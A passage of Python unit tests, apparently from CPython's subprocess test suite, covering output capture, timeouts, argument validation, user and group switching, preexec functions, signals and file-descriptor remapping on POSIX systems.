# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so as a unique mode
# for us to test the child's touched file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
